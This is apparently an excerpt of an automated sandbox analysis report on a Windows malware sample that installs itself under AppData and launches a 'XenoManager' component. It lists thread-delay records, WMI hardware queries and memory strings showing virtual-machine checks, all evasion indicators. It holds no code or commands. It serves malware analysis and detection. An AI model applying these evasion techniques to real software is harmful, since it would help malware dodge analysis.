                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 595953
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 595844
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 595719
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 595609
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 595500
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599437
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599328
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599218
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598997
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598765
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598651
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598203
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597933
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597812
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597702
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597593
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597480
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597363
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597234
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 597124
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Thread delayed: delay time: 573647
                      Source: C:\Windows\System32\OpenSSH\ssh.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\manager.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Window / User API: threadDelayed 4962
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Window / User API: threadDelayed 4872
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Window / User API: threadDelayed 2411
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe - Window / User API: threadDelayed 4730
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Window / User API: threadDelayed 6624
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe - Window / User API: threadDelayed 3231
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe TID: 5236 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599762s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599649s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599547s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -599078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598725s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598516s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -598078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597731s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597516s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597296s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -597076s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596857s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596738s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596624s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -596062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -595953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -595844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -595719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -595609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 - Thread sleep time: -595500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668Thread sleep count: 2411 > 30
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668Thread sleep count: 4730 > 30
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -599109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598997s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598651s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -598093s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597933s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597702s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597480s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597363s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -597124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312Thread sleep time: -573647s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8036Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8044Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\manager.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 8164Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 1576Thread sleep count: 6624 > 30
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 6196Thread sleep count: 3231 > 30
                      Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 4072Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 5696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 183684Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 344684Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599762
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599649
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598725
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597731
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597076
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596857
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596738
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596391
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598997
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598651
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597933
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597480
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597363
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 597124
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 573647
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\manager.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Thread delayed: delay time: 922337203685477
Source: Amcache.hve.36.dr | Binary or memory string: VMware
Source: 0LpFv1haTA.exe, 0000000D.00000002.2439788315.000001E4481F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=@
Source: 0LpFv1haTA.exe, 00000000.00000002.2104891776.0000019457E92000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0LpFv1haTA.exe, 0000002E.00000002.3230872411.000001B2AF9D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll''g
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.36.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 0LpFv1haTA.exe, 00000007.00000002.4565048036.0000021F0F6EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.36.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.36.dr | Binary or memory string: vmci.sys
